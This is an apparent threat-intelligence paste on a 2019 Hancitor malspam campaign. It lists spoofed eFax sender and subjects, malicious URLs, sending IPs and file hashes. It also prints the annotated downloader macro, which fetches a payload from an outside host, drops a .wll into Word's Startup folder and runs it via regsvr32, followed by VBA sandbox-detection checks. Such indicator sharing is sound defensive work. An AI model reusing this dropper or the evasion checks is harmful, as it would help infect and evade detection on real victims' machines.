HerbieZimmerman

2019-10-17 Hancitor

Oct 17th, 2019
  1. Sender
  2. ========
  3. eFax j2 Global, Inc. <eFax@shiplawyer.com>
  4.  
  5. Subjects
  6. =========
  7. You've received efax Notification
  8. You have received efax Message
  9. This is efax Notice
  10. This is an electronic eFax Notice
  11. You've got eFax Notice
  12. This is an electronic eFax Notification
  13. This is eFax Notification
  14. You've received eFax Notice
  15.  
  16. Embedded links
  17. ===============
  18. http://cmstephensconsulting.com/7izt/rjdcowboy.php
  19. http://dbh.dixitninad.com/.well-known/sylvek1978.php
  20. http://developermurtaza.website/js/wilsonderyeck.php
  21. http://directoryredlands.com/wp-content/tmeyer42.php
  22. http://matexpress.com/map/shaneogrady.php
  23. http://nchr.vn/wp-content/seanbwarbird.php
  24. http://rva.agentgrowthpartners.com/.well-known/williamw141955.php
  25. http://sha256.uaround.ru/presentation/wmatthews11.php
  26. http://socialprofile.in/scopic/walli_sw.php
  27. http://spsconsultancyservices.com/wp-admin/sti.plus.php
  28. http://swacvirals.com/wp-admin/walpasley.php
  29. http://wondarshop.in/assests/zumathe.php
  30. http://workxpro.co.in/wp-admin/rklug.php
  31.  
  32. Email IPs
  33. ===========
  34. shiplawyer.com (173-167-51-106-cpennsylvania.hfc.comcastbusiness.net [173.167.51.106])
  35. shiplawyer.com (rrcs-71-40-138-178.se.biz.rr.com [71.40.138.178])
  36. shiplawyer.com (24-35-137-143.fidnet.com [24.35.137.143])
  37. shiplawyer.com (h207.163.117.75.dynamic.ip.windstream.net [75.117.163.207])
  38. shiplawyer.com (c-73-154-113-150.hsd1.wv.comcast.net [73.154.113.150])
  39. shiplawyer.com (071-045-160-192.res.spectrum.com [71.45.160.192])
  40. shiplawyer.com (72-16-245-65.customerip.birch.net [72.16.245.65])
  41. shiplawyer.com ([76.4.44.68])
  42. shiplawyer.com (66-188-168-9.dhcp.stcd.mn.charter.com [66.188.168.9])
  43. shiplawyer.com (64-72-38-48.flntcmtc01.com.sta.suddenlink.net [64.72.38.48])
  44. shiplawyer.com (static-71-172-32-163.nwrknj.fios.verizon.net [71.172.32.163])
  45. shiplawyer.com ([206.63.185.26])
  46. shiplawyer.com (50-255-199-149-static.hfc.comcastbusiness.net [50.255.199.149])
  47. shiplawyer.com ([12.180.172.18])
  48. shiplawyer.com ([66.209.42.145])
  49. shiplawyer.com ([96.71.254.6])
  50. shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
  51. shiplawyer.com ([199.190.54.215])
  52. shiplawyer.com (50-252-19-58-static.hfc.comcastbusiness.net [50.252.19.58])
  53. shiplawyer.com (cpe-75-86-78-26.wi.res.rr.com [75.86.78.26])
  54. shiplawyer.com (c-24-6-32-99.hsd1.ca.comcast.net [24.6.32.99])
  55. shiplawyer.com (c-68-37-17-12.hsd1.mi.comcast.net [68.37.17.12])
  56. shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
  57. shiplawyer.com (rrcs-208-125-27-66.nyc.biz.rr.com [208.125.27.66])
  58. shiplawyer.com (cpe-104-172-16-234.socal.res.rr.com [104.172.16.234])
  59.  
  60. Munin results
  61. ===============
  62. _________ _ _ ______ _____ ______
  63. | | | | | \ | | | | | | \ \ | | | | \ \ /.)
  64. | | | | | | | | | | | | | | | | | | | | /)\|
  65. |_| |_| |_| \_|__|_| |_| |_| _|_|_ |_| |_| // /
  66. /'" "
  67.  
  68. Online Hash Checker for Virustotal and Other Services
  69. Florian Roth - 0.13.0 April 2019
  70.  
  71.  
  72. [+] Found results CSV from previous run: check-results_attach.csv
  73. [+] Appending results to file: check-results_attach.csv
  74. [ ] Processing /attach/e_fax_46164.doc ...
  75. [ ] Processing /attach/e_fax_46164_4616.zip ...
  76. [+] Processing 2 lines ...
  77.  
  78. 1 / 2 > Unknown
  79. HASH: a8645292476686686c82fe04f5378f7e0d141b2bcf54c89970a18cc366342a1d COMMENT: /attach/e_fax_46164.doc
  80. RESULT: - / -
  81.  
  82. 2 / 2 > Unknown
  83. HASH: 81b35cdf0d1e8a239641c25dd32165d658992f1a9058190b0ae773fc70bd8725 COMMENT: /attach/e_fax_46164_4616.zip
  84. RESULT: - / -
  85.  
  86. Macro script
  87. ==============
  ' Analyst note: entry point. Word runs a macro named AutoOpen when the document is opened (VBA names are case-insensitive); it only calls loYscbk.
  88. Sub AutoopeN(): loYscbk: End Sub
  89.  
  ' Analyst note: downloader/dropper stage. The paste has lost the string quotes (and apparently some operators), so the listing is not runnable as shown.
  ' Observable behaviour for detection: Word automating Internet Explorer over COM, a new .wll file written under %APPDATA%\Microsoft\Word\Startup\,
  ' and regsvr32.exe started through WMI Win32_Process (such a process is typically parented by the WMI provider host, not by Word).
  90. Sub loYscbk()
  91.  
  92. On Error Resume Next ' every runtime error below is silently ignored
  93. Set ess = CreateObject(InternetExplorer.Application) ' the download goes through IE automation rather than a direct request from Word
  94. RSOgEnmZmP.CreateFolder (p) ' RSOgEnmZmP and p are only assigned at listing lines 99-100, so this call fails and the error is suppressed
  95. ess.Navigate http://maritimelawyers.us/download.html ' payload URL (network indicator)
  96. State = 0
  97. Do Until State = 4: DoEvents: State = ess.readyState: Loop ' wait until the page has finished loading (readyState 4)
  98. Dim RlAqIQeVT: RlAqIQeVT = ess.Document.Body.getElementsByTagName(pre).Item(0).innerHTML ' payload text is taken from the first <pre> element of the page
  99. p = Environ(APPDATA) & \Microsoft\Word\Startup\ ' Word loads add-ins from this folder at start-up, so a file dropped here also persists
  100. Set RSOgEnmZmP = CreateObject(Scripting.FileSystemObject)
  101. If Not RSOgEnmZmP.FolderExists(p) Then
  102. RSOgEnmZmP.CreateFolder (p)
  103. End If
  104. Randomize
  105. p = p & Int(Rnd * 999) 1 & F.wll ' expression is garbled in the paste; it appears to build a random numeric name ending in "F.wll" - confirm against the sample
  106. Set objFile = RSOgEnmZmP.CreateTextFile(p, True) ' True = overwrite an existing file
  ' The next line walks the downloaded text two characters at a time and writes each pair as one byte (hex-encoded payload).
  107. With objFile: For lp = 1 To Len(RlAqIQeVT) Step 2: .Write Chr(CByte(&H & Mid(RlAqIQeVT, lp, 2))): Next: End With: objFile.Close
  108. Set objWMIService = GetObject(winmgmts:Win32_Process)
  109. objWMIService.Create regsvr32.exe-sp,,,processid ' arguments are garbled; presumably regsvr32.exe is run silently on the dropped file p - confirm against the sample
  110. MsgBox The document is protected, you will need to specify a password to unlock. ' decoy message shown to the user
  111. Dim myUserForm As UserForm1
  112. Set myUserForm = New UserForm1
  113. myUserForm.Show ' UserForm1 is not included in the paste; presumably part of the same decoy
  114. Application.Quit ' closes Word once the form is dismissed
  115. End Sub
  116.  
  117. Questionable part of script (environment / sandbox checks that report OK or DETECTED)
  118. =============================
  ' Analyst note: environment check. Collects application names through WordBasic.AppGetNames and reports DETECTED
  ' when any name contains one of the virtualisation / analysis-tool substrings in tns; otherwise reports OK.
  119. Public Sub checkApps()
  120. printMsg "[*] WordBasic.AppGetNames ..."
  121. d = False
  122. tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
  123. Set ws = GetObject("winmgmts:\\.\root\cimv2") ' ws is not used again in this Sub
  124. Dim names() As String
  125. ReDim names(WordBasic.AppCount())
  126. WordBasic.AppGetNames names ' fills the array passed to it
  127. For Each n In names
  128. For Each tn In tns
  129. If InStr(LCase(n), tn) > 0 Then ' case-insensitive substring match
  130. d = True
  131. End If
  132. Next
  133. Next
  134. If d Then
  135. printMsg "DETECTED"
  136. Else
  137. printMsg "OK"
  138. End If
  139. End Sub
  140.  
  ' Analyst note: environment check. Reports DETECTED when WordBasic.AppCount() returns fewer than 50, otherwise OK.
  ' A freshly built analysis VM with little running is the kind of host this threshold is aimed at (presumably).
  141. Public Sub checkAppCount()
  142. printMsg "[*] Checking WordBasic.AppCount() ..."
  143. If WordBasic.AppCount() < 50 Then
  144. printMsg "DETECTED"
  145. Else
  146. printMsg "OK"
  147.  
  148. End If
  149. End Sub
  150.  
  ' Analyst note: environment check. Reports DETECTED when the active document is not named exactly "Pafish.docm",
  ' i.e. when the file has been renamed before being opened; otherwise OK.
  151. Public Sub checkPreciseFileName()
  152. printMsg "[*] Checking Precise Filename ..."
  153. badName = False
  154. If ActiveDocument.Name <> "Pafish.docm" Then
  155. badName = True
  156. End If
  157. If badName Then
  158. printMsg "DETECTED"
  159. Else
  160. printMsg "OK"
  161. End If
  162.  
  163. End Sub
  164.  
  ' Analyst note: environment check on the document name. It counts characters into c and reports DETECTED when
  ' c >= Len(name) - 5. The intent is presumably to spot names made of hex digits (samples stored under their hash).
  165. Public Sub checkFilenameHash()
  166. printMsg "[*] Checking Filename Hashname ..."
  167. hexchars = "0123456789abcdef"
  168. c = 0
  169. For i = 1 To Len(ThisDocument.Name)
  170. s = Mid(LCase(ThisDocument.Name), i, 1) ' one lower-cased character of the name
  171. If InStr(s, hexchars) > 0 Then ' InStr searches its first argument for the second: here the 16-character string is looked for inside the single character s
  172. c = c + 1
  173. End If
  174. Next
  175.  
  176. If c >= (Len(ThisDocument.Name) - 5) Then
  177. printMsg "DETECTED"
  178. Else
  179. printMsg "OK"
  180. End If
  181. End Sub
  182.  
  ' Analyst note: environment check. Reports DETECTED when the lower-cased full path of the active document
  ' contains one of the substrings in badNames (names typical of sample handling); otherwise OK.
  183. Public Sub checkFilenameBad()
  184. printMsg "[*] Checking Bad Filename ..."
  185. badName = False
  186. badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop") ' "Desktop" has a capital D while the path below is lower-cased
  187. For Each n In badNames
  188. If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
  189. badName = True
  190. End If
  191. Next
  192.  
  193. If badName Then
  194. printMsg "DETECTED"
  195. Else
  196. printMsg "OK"
  197. End If
  198. End Sub
  199.  
  ' Analyst note: environment check. Walks Application.Tasks and reports DETECTED when any task name contains
  ' one of the virtualisation / analysis-tool substrings in badTaskNames; otherwise OK.
  200. Public Sub checkTasks()
  201. printMsg "[*] Checking Application.Tasks.Name ..."
  202. badTask = False
  203. badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
  204. For Each Task In Application.Tasks
  205. For Each badTaskName In badTaskNames
  206. If InStr(LCase(Task.Name), badTaskName) > 0 Then ' case-insensitive substring match
  207. badTask = True
  208. End If
  209. Next
  210. Next
  211. If badTask Then
  212. printMsg "DETECTED"
  213. Else
  214. printMsg "OK"
  215. End If
  216. End Sub
  217.  
  ' Analyst note: environment check. Queries Win32_Processor over WMI and reports DETECTED when any processor
  ' reports fewer than 3 cores; otherwise OK. Analysis VMs provisioned with one or two cores trip this.
  218. Public Sub checkCores()
  219. printMsg "[*] Checking Win32_Processor.NumberOfCores ..."
  220. badCores = 0
  221. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
  222. Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48) ' 48 = return immediately + forward-only enumerator
  223. For Each objItem In colItems
  224. If objItem.NumberOfCores < 3 Then
  225. badCores = True
  226. End If
  227. Next
  228.  
  229. If badCores Then
  230. printMsg "DETECTED"
  231. Else
  232. printMsg "OK"
  233. End If
  234. End Sub
  235.  
  ' Analyst note: environment check. Queries Win32_Bios over WMI and reports DETECTED when SMBIOSBIOSVersion or
  ' SerialNumber contains "virtualbox", "vmware" or "kvm" (case-insensitive); otherwise OK.
  236. Public Sub checkBios()
  237. printMsg "[*] Checking Win32_Bios.SMBIOSBIOSVersion & SerialNumber ..."
  238. badBios = False
  239. badBiosNames = Array("virtualbox", "vmware", "kvm")
  240. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
  241. Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
  242. For Each objItem In colItems
  243. For Each badName In badBiosNames
  244. If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
  245. badBios = True
  246. End If
  247. If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
  248. badBios = True
  249. End If
  250. Next
  251. Next
  252. If badBios Then
  253. printMsg "DETECTED"
  254. Else
  255. printMsg "OK"
  256. End If
  257. End Sub
  258.  
  ' Analyst note: environment check. Queries Win32_PnPEntity over WMI and compares each DeviceId with the PCI
  ' vendor strings VEN_80EE and VEN_15AD (the vendor IDs used by VirtualBox and VMware virtual devices).
  259. Public Sub checkPnP()
  260. printMsg "[*] Checking Win32_PnPEntity.DeviceId ..."
  261. badPNP = False
  262. badPNPNames = Array("VEN_80EE", "VEN_15AD")
  263. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
  264. Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
  265. For Each objItem In colItems
  266. For Each badName In badPNPNames
  267. If InStr(LCase(objItem.DeviceId), badName) > 0 Then ' DeviceId is lower-cased here while the strings in badPNPNames are upper-case
  268. badPNP = True
  269. End If
  270. Next
  271. Next
  272. If badPNP Then
  273. printMsg "DETECTED"
  274. Else
  275. printMsg "OK"
  276. End If
  277. End Sub
  278.  
  ' Analyst note: environment check. Queries Win32_ComputerSystem over WMI and reports DETECTED when UserName
  ' contains "admin", "malfind", "sandbox" or "test" (case-insensitive substring); otherwise OK.
  279. Public Sub checkUsername()
  280. printMsg "[*] Checking Win32_ComputerSystem.Username ..."
  281. badUsername = False
  282. badUsernames = Array("admin", "malfind", "sandbox", "test")
  283. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
  284. Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
  285. For Each objItem In colItems
  286. For Each badName In badUsernames
  287. If InStr(LCase(objItem.UserName), badName) > 0 Then
  288. badUsername = True
  289. End If
  290. Next
  291. Next
  292. If badUsername Then
  293. printMsg "DETECTED"
  294. Else
  295. printMsg "OK"
  296. End If
  297. End Sub
  298.  
  ' Analyst note: environment check. Queries Win32_ComputerSystem over WMI; a domain-joined host reports OK and
  ' a host that is not part of a domain reports DETECTED (the reverse of most other checks in this listing).
  299. Public Sub checkPartOfDomain()
  300. printMsg "[*] Checking Win32_ComputerSystem.PartOfDomain ..."
  301. partOfDomain = False
  302. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
  303. Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
  304. For Each objItem In colItems
  305. If objItem.partOfDomain Then
  306. partOfDomain = True
  307. End If
  308. Next
  309. If partOfDomain Then
  310. printMsg "OK"
  311. Else
  312. printMsg "DETECTED"
  313. End If
  314. End Sub
  315.  
  ' Analyst note: environment check. Tests for the ":Zone.Identifier" alternate data stream on the document itself
  ' (the mark Windows attaches to downloaded files). Present -> OK; absent -> DETECTED, which is the case for
  ' a sample copied into an analysis system without that stream.
  ' NOTE(review): whether FileExists resolves a stream path this way is not shown here - confirm in a test VM.
  316. Public Sub checkZoneIdentifier()
  317. printMsg "[*] Checking Zone.Identifier ..."
  318. If CreateObject("Scripting.FileSystemObject").fiLEExistS(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
  319. printMsg "OK"
  320. Else
  321. printMsg "DETECTED"
  322. End If
  323. End Sub
  324.  
  ' Analyst note: environment check. Reports DETECTED when Application.Tasks.Count is below 3, otherwise OK.
  325. Public Sub checkNbrOfTask()
  326. printMsg "[*] Checking Application.Tasks.Count ..."
  327. If Application.Tasks.Count < 3 Then
  328. printMsg "DETECTED"
  329. Else
  330. printMsg "OK"
  331. End If
  332. End Sub
  333.  
  ' Analyst note: environment check. Reports DETECTED when Word's recent-files list holds fewer than 3 entries,
  ' otherwise OK. A clean Office profile in an analysis image is what this looks for (presumably).
  334. Public Sub checkRecentDocs()
  335. printMsg "[*] Checking Application.RecentFiles.Count ..."
  336. If Application.RecentFiles.Count < 3 Then
  337. printMsg "DETECTED"
  338. Else
  339. printMsg "OK"
  340. End If
  341. End Sub
  342.  
  ' Analyst note: reporting helper used by every check. Appends msg to the body of the active document and then
  ' rewrites "pafish.log" with the document text followed by msg. The log name is a relative path, so the file
  ' is created in whatever the current directory is (host artefact worth looking for).
  343. Public Function printMsg(msg)
  344. ActiveDocument.Range.Text = ActiveDocument.Range.Text & msg
  345. Set RSOgEnmZmP = CreateObject("Scripting.FileSystemObject")
  346. outFile = "pafish.log"
  347. Set objFile = RSOgEnmZmP.CreateTextFile(outFile, True) ' True = overwrite, so the log is recreated on every call
  348. objFile.Write ActiveDocument.Range.Text & msg
  349. objFile.Close
  350. End Function
  351.  
  ' Analyst note: presentation only. Splits the document text on carriage returns, colours paragraphs that are
  ' exactly "OK" green and exactly "DETECTED" red, then sets paragraph spacing to 0 and the font size to 8.
  352. Public Sub mark()
  353. Text = ActiveDocument.Range.Text
  354. toks = Split(Text, vbCr)
  355. c = 0 ' running character offset of the current paragraph within the document
  356. For Each tok In toks
  357. l = Len(tok)
  358. If tok = "OK" Then
  359. ActiveDocument.Range(c, c + l).Font.Color = vbGreen
  360. End If
  361. If tok = "DETECTED" Then
  362. ActiveDocument.Range(c, c + l).Font.Color = vbRed
  363. End If
  364. c = c + l + 1 ' +1 skips the carriage return that Split removed
  365. Next
  366. ActiveDocument.Range.ParagraphFormat.SpaceBefore = 0
  367. ActiveDocument.Range.ParagraphFormat.SpaceAfter = 0
  368. ActiveDocument.Range.Font.Size = 8
  369. End Sub